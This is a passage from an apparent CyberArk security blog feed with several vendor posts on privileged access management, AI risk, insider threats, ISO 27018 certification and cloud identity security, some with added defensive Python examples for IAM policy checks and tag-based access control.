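        print(f"[{f['severity']:8}] {f['time']} {f['actor']} {f['event']} from {f['source_ip']}")
    print(severity_counts(results))
```

Root activity that matches your documented break-glass procedure still shows up here by design; reconcile those findings against the vault's checkout records rather than suppressing them in the detector.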

2) Operational Accounts with Privileged Access

Operational accounts with privileged access roles are created for SaaS applications and CSPs and they should be used for day-to-day tasks that have varying permissions levels. Following a ZSP north star, these accounts do not need standing privileges and should be provisioned just-in-time (JIT).

These accounts include:

  • SaaS business application accounts are administrative accounts created for cloud consoles, CRMs or ERP systems. They are privileged accounts because they can access sensitive data and business-critical information. These accounts can be used by employees, vendors and contractors, and they hold varying entitlements and access levels, making them significant threat targets.
  • Privileged personal accounts, such as personal admin or -A accounts, are used for server administration, deployment and infrastructure support.
  • AWS IAM user accounts are created by an AWS root user with varying levels of entitlements and attributes to carry out day-to-day tasks. These accounts can be used by humans, applications or machine-based identities and can be assigned to role-based access groups. Users needing access to the AWS console should have an IAM account to adhere to the principle of least privilege and avoid sharing credentials.

3) Application or Machine Accounts – Non-Human Accounts with Privileged Access

Application or machine accounts are non-human accounts used by machines to communicate with one another and by applications, RPA bots, container services and IoT/OT devices. These accounts introduce additional threats to the organization.

A few types of these accounts are:

  • Service accounts, which are found in Unix and Linux, Windows and CSPs. They’re created to manage tasks and application pools, run virtual machines (VMs), scripts and automated services, and interact with operating systems. Service accounts and their dependencies should be centrally managed and vaulted, and their access should be monitored and audited.
  • Robotic process automation (RPA) accounts emulate humans and are used to build, deploy and manage software robots to carry out automation tasks. These non-human accounts are privileged and often share credentials to extract data and interact with cloud services and APIs. RPA technology introduces a new attack surface given the level of privilege the bots need to do their job.

Secure Identities and Shut Down Attackers

High-risk access is an ongoing issue as organizations scale. Whether on-premises, in cloud consoles or in SaaS-based applications – privilege is everywhere, and managing an evolving PAM program means securing access for modern use cases.

With this in mind, today’s attack surface has evolved and become more complex – and how organizations secure their privileged accounts must remain in step with effective security controls. Implementing an identity security framework with intelligent controls at the center will allow you to secure the keys to the kingdom and enable operational efficiencies for your users and extended workforce.

Learn how CyberArk can help you address modern use cases for your PAM program – and keep your organization safe from identity-based threats.

Ryne Laster is a product marketing manager at CyberArk.

]]>
CyberArk Global CIO on Balancing AI Opportunities and Risks https://www.cyberark.com/blog/cyberark-global-cio-on-balancing-ai-opportunities-and-risks/ Tue, 22 Aug 2023 12:50:22 +0000 https://www.cyberark.com/?p=181648 CyberArk Global CIO on Balancing AI

Generative artificial intelligence (AI) has officially arrived at the enterprise and is poised to disrupt everything from customer-facing applications and services to back-end data and infrastructure to workforce engagement and empowerment. Cyberattackers also stand to benefit: 93% of security decision makers expect AI-enabled threats to affect their organization in 2023, with AI-powered malware cited as the No. 1 concern.

Facing this reality, IT and security leaders must strategically capture new business value while mitigating the risk brought by AI-enabled tools. A security-first mindset and the ability to adapt are critical because, as years in the military taught me, the only way to the end is through.

Five Steps for Securely Embracing the Enterprise AI Opportunity

Part of my job as CyberArk Global Chief Information Officer is utilizing new data-driven tools and cloud technologies to support resiliency, speed and scale. It’s an exciting time to be a technologist and I see many potential ways to harness AI technology to advance CyberArk’s mission and growth. In some areas, we’re already doing so. Personally, I believe AI tools can help me be a more productive, focused and impactful leader.

Yet navigating AI’s Wild West is challenging. With no playbook or precedent to follow, information sharing is crucial. In that spirit – and based on our team’s experiences, ongoing peer conversations and market insights – here are five practices for IT and security leaders to consider as enterprise AI use cases expand:

1. Define your organization’s AI position from the start. Is your company already using generative AI at enterprise scale? Perhaps it is just beginning a proof of concept (PoC) to test the waters. Or maybe it has drawn a hard line by blocking ChatGPT and similar tools until regulators can catch up and guardrails are codified. Whatever your organization’s AI position may be, it must be clearly defined and communicated from the top so everyone starts – and stays – on the same page.

2. Open the lines of communication. Establishing AI-specific company guidelines, publishing usage policies and updating employee cybersecurity training curricula are necessary steps. But real dialogue goes both ways.

At CyberArk, employees are encouraged to send their AI-related questions, ideas and requests to a dedicated email address. An AI “tiger team” of cross-functional experts meets bi-weekly to review and respond to each submission, identify high-value use cases and work to create secure models – using AI tools and aligning with organizational policy – that teams can use. As we move forward, this team will play an integral role in tackling emerging challenges and devising creative strategies that help us maximize AI benefits.

3. Revisit the internal software request process. According to the 2023 CyberArk Identity Security Threat Landscape Report, employees in 62% of organizations use unapproved AI-enabled tools that can increase security risk. This highlights the need for IT and security leaders to adapt their approaches or risk being viewed as innovation blockers.

Like most IT departments, my team is experiencing a surge in workforce requests for AI-enabled tools and add-ons. In response, we’ve enhanced our third-party software vetting system to help meet employees’ needs more efficiently while doing our due diligence. But this process doesn’t stop at employee requests. Why? Because “assume breach” also means we must “assume shadow IT” (software downloaded and used without IT’s approval) and “assume clicks” (especially as AI-fueled phishing campaigns become increasingly convincing). We proactively layer endpoint security controls with malware-agnostic defenses to enforce Zero Trust and least privilege and close gaps caused by inevitable human error.

4. Speak the CFO’s language. As technology leaders, we must build operationally efficient platforms and environments – even more so in the current economic climate. As changemakers, we must demonstrate AI’s business value to our CFOs. An honest, rational approach backed by hard data is critical; illustrating how a tool can help advance multiple business priorities is even more powerful.

Here’s an example “pitch” that uses recent stats on the AI-powered developer tool GitHub Copilot: “Early data shows that this tool can help our developers code – and innovate – up to 55% faster. But increased speed is just the start – it can also help us engage our employees more effectively: 75% of developers say the tool helps them feel more fulfilled and able to focus on more satisfying work. This is important since studies have linked higher job satisfaction to stronger employee retention, customer loyalty and company financial performance.”

5. Continuously assess AI threats. This means rigorously assessing all AI-enabled tools before use, continuously assessing all AI-enabled tools in use and having the ability to immediately block and roll back any AI-enabled tool if it’s necessary. It also means constantly thinking like an attacker and concentrating on identities, their greatest opportunity area.

Security researchers have already uncovered numerous ways that threat actors could use AI to improve techniques in the early phases of identity-based attacks. For instance, AI can help them write legitimate-sounding email copy for phishing campaigns, generate malware that evades detection or bypass facial recognition authentication. Just recently, CyberArk Labs used a short clip of my voice – pulled from the only English-language podcast I’ve ever recorded – to create an AI-generated deep fake that could be used for voice phishing. It’s yet another way attackers are innovating to circumvent traditional security controls. If my colleagues could do this in less than five minutes, imagine how easy it would be for an attacker to impersonate a high-profile executive or government leader who’s frequently on TV.

Amplifying Security Approaches with AI


IT and security teams are also using AI to adapt and improve cyber resilience. While human talent remains critical for combatting emerging threats, AI can help bridge some of the gaps caused by the 3.4-million-person cybersecurity worker shortage. CyberArk’s latest research found that 41% of cybersecurity teams use AI to address skills and resource shortages and 47% use AI for automation today.

Generative AI has the potential to transform many security functions as it continues to improve. Take the security operations center (SOC), for example. By automating time-intensive tasks such as triaging level-one threats or updating security policies, hard-working SecOps professionals can focus on more satisfying work. Ultimately, this may help reduce staffing shortage issues while curbing employee turnover and attrition – the second largest contributor to the cyber skills shortage, according to the latest (ISC)2 Cybersecurity Workforce Study.

Technology is constantly changing. Right now, we’re experiencing another wave in a continuous evolution cycle. There will be challenges ahead, but leadership is all about making decisions in the face of uncertainty. With an open mind and unwavering security focus, technology leaders can confidently navigate these uncharted waters and embrace new opportunities.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

]]>
Five Workforce Trends That Intensify Insider Threats https://www.cyberark.com/blog/five-workforce-trends-that-intensify-insider-threats/ Thu, 17 Aug 2023 14:15:30 +0000 https://www.cyberark.com/?p=181696 Five Workforce Trends That Intensify Insider Threats

Insider threats don’t often seem like threats at all. They look like colleagues working diligently at the office, logging on to the corporate network from Starbucks or providing a critical third-party service. But insider threats are a big problem that’s getting even bigger and costlier to tackle.


A 2022 Ponemon Institute study found that insider threat incidents surged by 44% in the two years analyzed, with impacted organizations spending $15.38 million annually on average to deal with the fallout. While hard numbers aren’t yet available for 2023, global risks and economic pressure are fueling five major workforce challenges that further intensify insider threats.

1. Workforce reductions. With any employee layoff or resignation comes the possibility that the person may take something they shouldn’t. According to the 2023 CyberArk Identity Security Threat Landscape Report, 58% of security professionals report instances of exiting users saving sensitive or confidential work documents outside of policy. In times of organizational turmoil, when concerns about layoffs might increase, these insider threats can worsen.

Consider this high-profile incident at a major beverage manufacturer: after learning of her upcoming layoff, an engineer exfiltrated documents containing trade secrets worth nearly $120 million in her final days as an employee. According to reports, she was one of just two people with access to the specifics of a top-secret chemical formula – the archetypal privileged user. The engineer was ultimately convicted and sentenced for her crime; however, the case highlights challenges many companies face in protecting intellectual property and other critical assets, especially during times of workforce change. Sixty-eight percent of security decision-makers expect layoffs and workforce churn to create new security issues in the next 12 months.

2. Shrinking third-party ecosystem. Cybersecurity risks due to belt-tightening extend to third-party vendors, such as contractors with insider access to sensitive information. If a third-party relationship ends and permissions aren’t promptly removed, the vendor could still access company assets or an external actor could hunt down these orphaned accounts and use them for malicious purposes.

Managing third-party access is a thorny challenge, no matter what’s happening in the world. In fact, surveyed security professionals say third parties – partners, consultants and service providers – represent the riskiest human identities.*

3. Rising “resenteeism.” As a July 2023 New York Times headline declared, “The ‘Great Resignation’ is over.” In this unstable economy, more employees are staying put. And a workplace buzzword is gaining traction to describe workers who aren’t thrilled about it – “resenteeism.” Whatever their grievances – from lack of job satisfaction to feeling undervalued or burned out – these workers tend to air them out in the open. Not only can resenteeism negatively affect workplace culture and productivity, but it can also increase malicious insider threat incidents.

Imagine an employee who’s experienced repeated promotion denials, feels undervalued and is growing increasingly resentful of their employer. “Getting even” might involve stealing or leaking sensitive data – or even advertising their ability to undermine their organization’s security, as security researchers recently observed. In a time when 63%* of organizations have not adequately secured the highest sensitivity access for their employees, there’s a chance the “resenteeist” could get away with it.

4. Personal financial hardship. The 2023 Verizon DBIR suggests that inflation and the soaring cost of living may be fueling more financially motivated insider threats. According to the report, privilege misuse – defined as “employees abusing the access they have been given to do their jobs,” and the leading cause of non-accidental internal actor breaches – is more often paired with fraudulent transactions than in the past several years. This could look like a financial comptroller – a privileged identity with access to systems where bank accounts and routing information are stored – making an unauthorized transfer into their own personal account.

DBIR authors write, “Seeing internal actors increasingly just redirect funds is especially concerning, considering it may be someone in a position to siphon significant resources away from the organization.”

5. Stress-driven slip-ups. Workforce reductions and churn have a profound impact on remaining employees. Many are expected to shoulder additional work, which can negatively impact stress levels. And stress goes hand in hand with mistakes.

Susceptibility to phishing and other social engineering attacks is already sky-high. Recent assessments by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) found that within the first 10 minutes of receiving a malicious email, 84% of employees took the bait by replying with sensitive information or interacting with a spoofed link or attachment. Overworked and overstressed employees could make it even easier for phishing attackers to “hook” credentials. And since 50%* of workforce identities have access to sensitive corporate data, their odds of reeling in a prize-winning catch are good.

As insider threats loom large, who can you trust?

That’s a trick question. Eighty-four percent of organizations experienced an identity-related breach in the past year* – further proof that trust has no place in cybersecurity.

By eliminating trust, any threat’s origin – inside, outside, anywhere – becomes less relevant. And without daunting labels, complicated threat categories or patchwork protections, security gets a lot simpler.

That’s the promise of identity security: powerful and continuous protection wrapped around every identity, grounded in Zero Trust and least privilege. With full visibility and control, organizations can quickly spot access misuse or abuse and other high-risk activities. Empowered, they can block and prevent threats from reaching critical assets and safeguard their infrastructure, devices and people – wherever they go.


*Source: 2023 CyberArk Identity Security Threat Landscape Report

Bryan Murphy is senior director of Architecture Services & Incident Response at CyberArk.

]]>
CyberArk Achieves ISO/IEC 27018 Certification – an International Standard for Cloud Privacy https://www.cyberark.com/blog/cyberark-achieves-iso-iec-27018-certification-an-international-standard-for-cloud-privacy/ Tue, 15 Aug 2023 18:35:29 +0000 https://www.cyberark.com/?p=181607 CyberArk Achieves ISO/IEC 27018 Certification – an International Standard for Cloud Privacy

It is my distinct honor to announce that CyberArk has officially achieved ISO/IEC 27018:2019 certification – the first privacy-specific international standard for cloud service providers focused on safeguarding personally identifiable information (PII), one of the most mission-critical components of cloud security.

Today, more than 8,000 organizations across 110 countries – including more than half of the Fortune 500 – trust CyberArk to protect their most critical assets. Maintaining this trust is our highest priority and we hold ourselves to stringent security and compliance standards. Part of this ongoing commitment involves rigorous reviews of our information security systems and infrastructure. With this ISO/IEC 27018:2019 certification, CyberArk has achieved significant, independent recognition for protecting data privacy and exceeding customer, partner and regulatory requirements for cloud security, transparency and accountability.

The ISO/IEC 27018 standard outlines specific guidelines to reduce information security risks pertaining to PII in public cloud offerings. It supplements and strengthens controls outlined in ISO/IEC 27002 and provides specific security guidance for protecting PII, which NIST defines as “any representation of information that permits the identity of an individual to whom the information applies to be reasonably inferred by either direct or indirect means.” This includes sensitive information such as a person’s full name, address, phone number or social security number.

CyberArk has built the following key guidelines into our security control framework to demonstrate conformance with ISO/IEC 27018:2019, emphasize our responsibility in handling sensitive data and show our customers how their data is securely stored, processed and managed in our cloud computing systems:

  • CyberArk does not use customer data for business marketing or advertising unless the customer consents to such use. The customer has control over their own data and CyberArk only processes PII in accordance with the customer’s instructions.
  • CyberArk handles PII in a specific manner when transmitting over public networks, storing on mobile devices or recovering or restoring data. Relevant CyberArk staff must also sign a confidentiality agreement and CyberArk provides specialized training for employees directly processing PII.
  • In the event of a breach affecting customer data, CyberArk will notify the customer without undue delay, maintain a clear record of the incident and assist the customer in remaining compliant with their own security obligations.
  • CyberArk must disclose the names of any sub-processors (and any location information about where PII may be processed). If we change sub-processors mid-contract, we must also disclose this information and provide the customer with the right to object to the change.

We remain committed to ensuring that all customer and partner information, in any form, is protected from unauthorized access, modification, disclosure or deletion.

You can learn more about CyberArk’s security practices and industry certifications in our Trust Center.

Omer Grossman is the global chief information officer at CyberArk.

]]>
Operationalizing Identity Security in the Public Cloud https://www.cyberark.com/blog/operationalizing-identity-security-in-the-public-cloud/ Thu, 10 Aug 2023 18:19:43 +0000 https://www.cyberark.com/?p=181547

As enterprises increasingly migrate to the public cloud, identity and access management (IAM) inconsistencies across different cloud providers pose a significant hurdle. Effectively securing identities in this complex landscape has proven to be a challenge. Discussions with industry analysts and enterprise clients have highlighted a prevalent issue: the existing security tool suite often falls short in providing actionable measures to weave identity security into cloud operations.

Many enterprises use native cloud provider tools, third-party security solutions and custom-built strategies to meet their cloud security needs. However, most of these approaches are reactive, offering band-aid fixes rather than robust, scalable solutions. The challenge then lies in devising a sustainable identity strategy for the cloud environment and operationalizing it effectively.

From Concept to Execution: Operationalizing Cloud Identity Security

The CyberArk Cloud Security framework offers a systematic and phased approach to streamline identity security operations within the cloud. It converts the broader concept of “IAM in the public cloud” into a solid, ROI-focused initiative. And we begin with the right set of identity security capabilities, such as risk-based access controls, entitlements risk and visibility, identity automation and orchestration, secrets management and audit and compliance – all supported by the enforcement of cloud best practices.


Prioritizing and Implementing the Proper Controls

Cloud identity and its associated challenges are constantly evolving, given the continuous innovation from cloud providers. At last count, there are over 1,400 native services spread across AWS, GCP and Azure, bringing in more than 40,000 entitlements and controls – and it’s an ever-growing list.

Standardizing roles or entitlements in this constantly changing environment becomes extremely challenging. This dynamic landscape often leaves IAM teams juggling multiple priorities. The initial focus is often on “discovery” and “right-sizing entitlements,” which fall within the domain of CIEM (Cloud Infrastructure Entitlements Management). While insightful, identifying and removing unused entitlements linked to cloud resources can be complex, particularly when unused permissions are tied to specific cloud project roles or identities.

As a result, resolving these issues necessitates a dialogue with the application teams, proof of non-utilization and a timeline for resolution. This can be lengthy, raising the question: while entitlement visibility and right-sizing is important, is it the first control to prioritize?

Meanwhile, during these debates about appropriate entitlements, standing access and associated risk persist in your cloud environments. Developers and apps often enjoy unrestrained, always-on access to your cloud environments. Especially in the case of lift-and-shift applications, developers often have standing access to the underlying compute workloads powering their applications. All these scenarios present a significant risk if these identities are compromised.

The Three Steps to Operationalizing Identity Security

To tackle this risk and streamline identity security operations, consider the following key steps:

1. Transition to a zero standing privilege model and eliminate standing access.

The road to least privilege is long and winding and comes with many operational challenges. To reduce your attack surface immediately, begin by transitioning all your privileged and non-privileged standing access to a just-in-time (JIT) based zero standing privilege (ZSP) model. The challenge lies in identifying your riskiest identities – admins, shadow admins, identities with sensitive privileges, identities with misconfigurations – and seamlessly shifting them to a JIT model.

CyberArk Cloud Security offers comprehensive visibility into your entire cloud identity estate’s risk and compliance posture. It enables the automatic and seamless migration of risky identities – or all cloud access – to a centralized platform: CyberArk Secure Cloud Access. By consolidating access policies, you can effectively manage and regulate access to resources across various cloud platforms, enhancing security and reducing complexity.

You can also stop the bleeding by applying a ZSP model when setting up new cloud environments, which ensures they start with a clean slate and no standing access. Nobody prefers revisiting and fixing issues after the fact.

Moving to a ZSP model significantly reduces your cloud risk surface, helps you demonstrate ROI via risk reduction to leadership, and helps you comply with cloud access control requirements stipulated by leading industry standards like NIST and SOC2.

2. Address non-human use cases and standardize audit and compliance.

Along with the immediate human access risks we’ve just addressed, there are, of course, non-human threats. Application and API access pose notable risks – and getting complete visibility into the non-human elements is a key measure.

Here are steps you can take to reduce significant risks:

  • Initiate centralizing non-human access and develop a unified system for managing secrets to secure access to your cloud environments.
  • Fix excessive and risky entitlements and identity issues across clouds. As you start addressing these issues, it’s essential to use a framework that helps you gain the right set of insights and take meaningful risk-reduction actions. Our Insight to Action framework in CyberArk Cloud Security was designed to help administrators do exactly that. The framework links risk insights to remediation recommendations that can be applied programmatically, through click-and-remediate solutions or automation.
  • Ensure that integrations are set up with the common tools used by the cloud security teams, cloud admins and infrastructure engineers. Integrations to ITSM and ChatOps tooling help seamlessly integrate access approval workflows and notifications.

3. Adopt proactive measures and embrace automation.

You’ve tackled the major risk factors related to human and non-human access and understand identity security nuances across the clouds used by your organization. Now embrace automation to enforce industry standards for both types of access.

There are over 100 out-of-the-box best practice rules in CyberArk Cloud Security, and you can extend the rule framework to build identity security rules based on your cloud environments’ internal guidelines and guardrails. This enables you to initiate the automation of fixes for common and recurring identity issues in the cloud.

(Screenshot: example of a rule-based finding.)

Again, nobody wants to go back and fix things. Ensure that new apps and cloud environments conform to the best practices you want to establish. Make it easy by automating these checks in the Infrastructure-as-Code (IaC) provisioning process.

The above steps will help you standardize audit and compliance requirements and gain complete visibility into cloud identities (human and non-human) and secrets dispersed across different stores in the cloud.
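As an added example (not CyberArk Cloud Security’s rule engine or any of its code), here is what a small set of rule-based identity findings looks like when evaluated over IAM-style policy documents and used as a pre-merge gate in an IaC pipeline. The rule identifiers, severities and the three sample policies are constructed for illustration:

```python
"""Rule-based findings over IAM-style policy documents, usable as an IaC gate.

Added example (not CyberArk code): a handful of checks of the kind a cloud identity
security tool evaluates, run over constructed sample policies so the gate can be
exercised offline.  Rule ids, severities and policies are all assumptions.
"""

# Constructed sample policies (not from any real account).
SAMPLE_POLICIES = {
    "ci-deployer": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    },
    "reports-reader": {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"],
        }],
    },
    "ops-passrole": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["iam:PassRole", "ec2:RunInstances"], "Resource": "*"},
            {"Effect": "Allow", "Action": "iam:CreateAccessKey", "Resource": "*"},
        ],
    },
}


def _as_list(value):
    """IAM lets Action/Resource/Statement be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


# Each rule is a predicate over one Allow statement.
def rule_full_admin(st):
    return "*" in _as_list(st.get("Action")) and "*" in _as_list(st.get("Resource"))


def rule_service_wildcard(st):
    # Whole-service grants such as "iam:*" or "s3:*".
    return any(a.endswith(":*") for a in _as_list(st.get("Action")))


def rule_passrole_unscoped(st):
    actions = {a.lower() for a in _as_list(st.get("Action"))}
    return "iam:passrole" in actions and "*" in _as_list(st.get("Resource"))


def rule_credential_creation(st):
    # Actions that mint new long-lived credentials, i.e. new standing access.
    risky = {"iam:createaccesskey", "iam:createloginprofile", "iam:updateloginprofile"}
    actions = {a.lower() for a in _as_list(st.get("Action"))}
    return bool(actions & risky) or "iam:*" in actions


RULES = [
    ("IAM-001", "critical", "Statement grants all actions on all resources", rule_full_admin),
    ("IAM-002", "high", "Statement grants a whole service via <service>:*", rule_service_wildcard),
    ("IAM-003", "high", "iam:PassRole allowed on Resource \"*\"", rule_passrole_unscoped),
    ("IAM-004", "high", "Statement can mint long-lived credentials", rule_credential_creation),
]


def evaluate_policy(name, policy):
    """Return one finding dict per (statement, rule) hit; Deny statements are skipped."""
    findings = []
    for idx, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue
        for rule_id, severity, description, predicate in RULES:
            if predicate(st):
                findings.append({"policy": name, "statement": idx, "rule": rule_id,
                                 "severity": severity, "description": description})
    return findings


def gate(policies, block_on=("critical", "high")):
    """Pipeline gate: (passed, findings).  Fails when any finding is at a blocking severity."""
    findings = [f for name, pol in policies.items() for f in evaluate_policy(name, pol)]
    passed = not any(f["severity"] in block_on for f in findings)
    return passed, findings


if __name__ == "__main__":
    ok, results = gate(SAMPLE_POLICIES)
    for f in results:
        print(f"[{f['severity']}] {f['policy']} stmt {f['statement']}: {f['rule']} {f['description']}")
    print("gate:", "PASS" if ok else "FAIL")
```

Running the gate over the constructed policies blocks the merge: the deployer policy is a full admin grant, and the ops policy can pass any role and mint access keys, while the scoped S3 reader produces no findings.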

Driving Value Through Standardized Cloud IAM Operations

Standardizing cloud IAM operations with CyberArk Cloud Security means establishing a consistent methodology for managing and enforcing best practices, securing access for humans and non-humans – and auditing and compliance across your cloud estate.

When effectively operationalized, a cloud identity security solution enhances your cybersecurity defenses, saves time, reduces risk and validates its cost by delivering rapid, measurable value. It’s a journey from abstract to concrete, making the intangible quantifiable in a robust and agile manner.

Read more about the various cloud access challenges in the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.”

Paddy Viswanathan is vice president of Cloud Solution Strategy at CyberArk.

The Cloud Security Layer Cake: Modern Use Cases for PAM https://www.cyberark.com/blog/the-cloud-security-layer-cake-modern-use-cases-for-pam/ Thu, 03 Aug 2023 15:37:30 +0000 https://www.cyberark.com/?p=181256

Warm. Rich. Chocolatey. The way I see it, a proper chocolate layer cake is the best sensory experience a human can have. Let’s go a bit further still: good chocolate cake is the height of human achievement.

In the world of enterprise IT, one could say the same of a diverse, purpose-built IT infrastructure. Every enterprise application – whether internal or customer-facing – must run on the right server, virtual machine (VM), container or database for the task at hand.

And like a perfect chocolate cake, modern enterprise infrastructure is multi-layered. One foundational IT layer is the Linux and Windows servers that still effectively power tried and true applications on-premises. Another layer is composed of the cloud-hosted VMs where organizations ‘lift and shift’ applications in search of operational efficiencies. SaaS applications that empower the workforce are yet another layer. The same applies to the containers and serverless functions powering an enterprise’s cloud-native applications. And then, of course, there’s the most powerful (and highest-risk) layer of modern IT – the cloud management layer – where engineers and admins launch or change configurations via console or command-line interface (CLI).

Securing the identities with high-risk access to each of these layers requires tailored controls. Identity security and privileged access management (PAM) programs, which organizations charge with securing their highest-risk access, can be carefully crafted to address every layer of modern IT infrastructure.

Essentially, PAM can help secure every layer of the cake. Here’s how…

Layer 1: PAM Controls for System-level Access to Workloads Running Inside VMs

It doesn’t matter how good a cake is if the foundation can’t support it. Many enterprises still directly manage much of the Linux, Windows, database and even mainframe infrastructure that powers their tried-and-true applications. This is especially true in highly regulated industries and verticals where low-latency computing is essential, like finance, energy and manufacturing. Even when organizations do move these established systems to the cloud for operational savings, many take a ‘lift-and-shift’ approach. These systems still work well, so there’s no need to re-architect them beyond moving them from on-prem servers to cloud-hosted VMs.

Whether they live on-premises or in the cloud, securing the privileged credentials and SSH keys that grant administrative access to these workloads will always be essential. This is especially true of built-in accounts on servers and VMs, such as Root accounts on Linux servers.

Foundational PAM best practices like automated credential rotation and least privilege access reduce the risk of credential theft. In some cases, these controls may even be required for IT security compliance or cyber insurance coverage.

Baking tip: Like good cake, good identity security programs need several layers. In addition to securing credentials, it’s essential to apply additional PAM best practices like monitoring and isolating privileged sessions. This can help deter insider threats while preventing ransomware and other malware from ever reaching VMs.


Layer 2: PAM Controls for Operational Access to Workloads Running ON VMs

Most VMs are short-lived. This is one of the foundational value propositions of cloud computing; organizations can run workloads on rented VMs without spending time and money on infrastructure maintenance. While high-risk administration on specific VMs may sometimes be necessary, organizations generally don’t create dedicated system-level accounts (and the associated risk) for access to these short-lived machines.

PAM programs play an important role in securing access to ephemeral workloads. When access to specific, self-managed systems is needed, operational privileged access can be elevated just-in-time (JIT) to reduce the risk of credential theft, helping reduce standing privileges. IT and development teams can natively elevate access without SSH Keys or passwords using attribute-based access control (ABAC). Identity security teams can tag workloads for a specific project using CSP tagging features, allowing end users to natively connect only to resources tagged with this attribute. And since users don’t have passwords with standing privileges, there is a significantly reduced risk of credential theft.
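The tag-based connection rule described above, as an added example that is neither CyberArk nor cloud provider code: a simplified evaluator for the ‘principal tag must equal resource tag’ condition pattern used in attribute-based access control. Action and condition key names follow AWS IAM conventions, but the evaluation logic is a model written to show the decision, not the provider’s policy engine; the principals, instances, tags and account id are constructed:

```python
"""ABAC tag-match check for native JIT access to tagged workloads.

Added example, not CyberArk's or a cloud provider's code.  Action and condition key
names follow AWS IAM naming; the evaluator itself is a simplified model.  All
principals, instances, tags and the account id below are constructed.
"""
import re

# Constructed standing grant: no passwords or SSH keys are involved, and the only thing
# it allows is opening a session on instances whose Project tag matches the caller's.
CONNECT_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["ssm:StartSession"],
        "Resource": "arn:aws:ec2:*:*:instance/*",
        "Condition": {
            "StringEquals": {"aws:ResourceTag/Project": "${aws:PrincipalTag/Project}"}
        },
    }],
}

# Constructed principals (tags asserted by the identity provider) and tagged workloads.
PRINCIPALS = {
    "alice": {"Project": "payments"},
    "bob": {"Project": "analytics"},
    "carol": {},                       # no Project tag at all
}
INSTANCES = {
    "i-0pay01": {"Project": "payments", "Env": "prod"},
    "i-0ana01": {"Project": "analytics"},
    "i-0orphan": {},                   # untagged workload: nobody matches it
}
ACCOUNT_ID = "123456789012"            # constructed placeholder

_PRINCIPAL_TAG_VAR = re.compile(r"^\$\{aws:PrincipalTag/([^}]+)\}$")


def _resolve(value, principal_tags):
    """Expand ${aws:PrincipalTag/Key}; None when the principal lacks that tag."""
    m = _PRINCIPAL_TAG_VAR.match(value)
    return principal_tags.get(m.group(1)) if m else value


def _glob_match(pattern, value):
    """IAM-style '*' wildcard matching for the Resource element."""
    return re.fullmatch(re.escape(pattern).replace(r"\*", ".*"), value) is not None


def _condition_holds(condition, principal_tags, resource_tags):
    # Only StringEquals on aws:ResourceTag/<Key> is modelled; anything else fails closed.
    for key, expected in condition.get("StringEquals", {}).items():
        if not key.startswith("aws:ResourceTag/"):
            return False
        actual = resource_tags.get(key[len("aws:ResourceTag/"):])
        wanted = _resolve(expected, principal_tags)
        if actual is None or wanted is None or actual != wanted:
            return False
    return True


def is_allowed(principal_tags, instance_id, resource_tags,
               action="ssm:StartSession", policy=CONNECT_POLICY):
    """Default deny: an Allow statement must match action, resource and condition."""
    arn = f"arn:aws:ec2:us-east-1:{ACCOUNT_ID}:instance/{instance_id}"
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or action not in st.get("Action", []):
            continue
        if not _glob_match(st["Resource"], arn):
            continue
        if _condition_holds(st.get("Condition", {}), principal_tags, resource_tags):
            return True
    return False


def access_matrix(principals=PRINCIPALS, instances=INSTANCES):
    """Who can open a session where: {principal: {instance_id: bool}}."""
    return {p: {i: is_allowed(pt, i, it) for i, it in instances.items()}
            for p, pt in principals.items()}


if __name__ == "__main__":
    for principal, row in access_matrix().items():
        reachable = [i for i, ok in row.items() if ok]
        print(f"{principal:6s} -> {reachable or 'no workloads'}")
```

Two edge cases are worth noticing in the output: a principal with no Project tag (carol) reaches nothing, and an untagged workload is reachable by nobody, because a missing tag on either side makes the equality condition fail rather than match an empty string.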

Baking tip: The absence of credentials does not equate to the absence of trust. To embrace Zero Trust concepts for cloud access, adopt the ‘never trust, always verify’ paradigm. PAM best practices like least privilege enforcement and session isolation cover the ‘never trust’ half by reducing the trust any one session is given. Meanwhile, the tried-and-true advice to implement adaptive multi-factor authentication (MFA) covers the ‘always verify’ half.

Layer 3: Access to Cloud Service Provider Services IN the Cloud

PAM teams already know: with great power comes great responsibility. Protecting the most powerful access in the public cloud is essential. And that includes the access elite engineers use to launch, configure and decommission the services powering their applications. Whether these engineers access this cloud management layer via web consoles or CLIs, their access must be protected.

JIT elevation can help reduce the risk of credential theft in these scenarios. But once access is elevated, development teams have, to borrow their parlance, ‘god-level’ entitlements to spin up – or take down – anything they want.

Many organizations are embracing the emerging security concept of zero standing privileges (ZSP) to safeguard development teams without slowing them down. In this model, engineers can elevate access JIT only to roles scoped with just enough permissions for the job at hand (or, in other words, least privilege access).

ZSP provides meaningful, defense-in-depth risk reduction. First, developers do not have credentials with always-on access, so those credentials can’t be stolen. Second, even if developers become malicious insiders or have their access compromised, their permissions are limited, reducing the blast radius of an attack.

Baking tip: Empower developers with ZSP, instead of slowing them down. In an outage or critical situation (‘critsit’), engineers need the ability to use their preferred tooling to request elevated entitlements and save the day. Integration with preferred development tooling is critical for these cases and any meaningful adoption of PAM controls. The same is true for session monitoring controls to deter internal threats and maintain audit trails for compliance purposes.


Layer 4: High-Risk Access to SaaS Apps

Risk isn’t confined to infrastructure and software environments. It also exists in cloud-hosted web applications used by every workforce member, from software engineers to HR and finance administrators. Unfortunately, this access also presents a significant security risk, considering attackers can use it to gain access to sensitive data.

Organizations can protect this final layer of high-risk access in the cloud with web browser session protection and monitoring controls. Session protection can defend against session hijacking and cookie theft attacks. Just as with infrastructure or console access, monitoring high-risk sessions can provide a complete audit trail of user activity to satisfy compliance requirements and deter internal misuse.

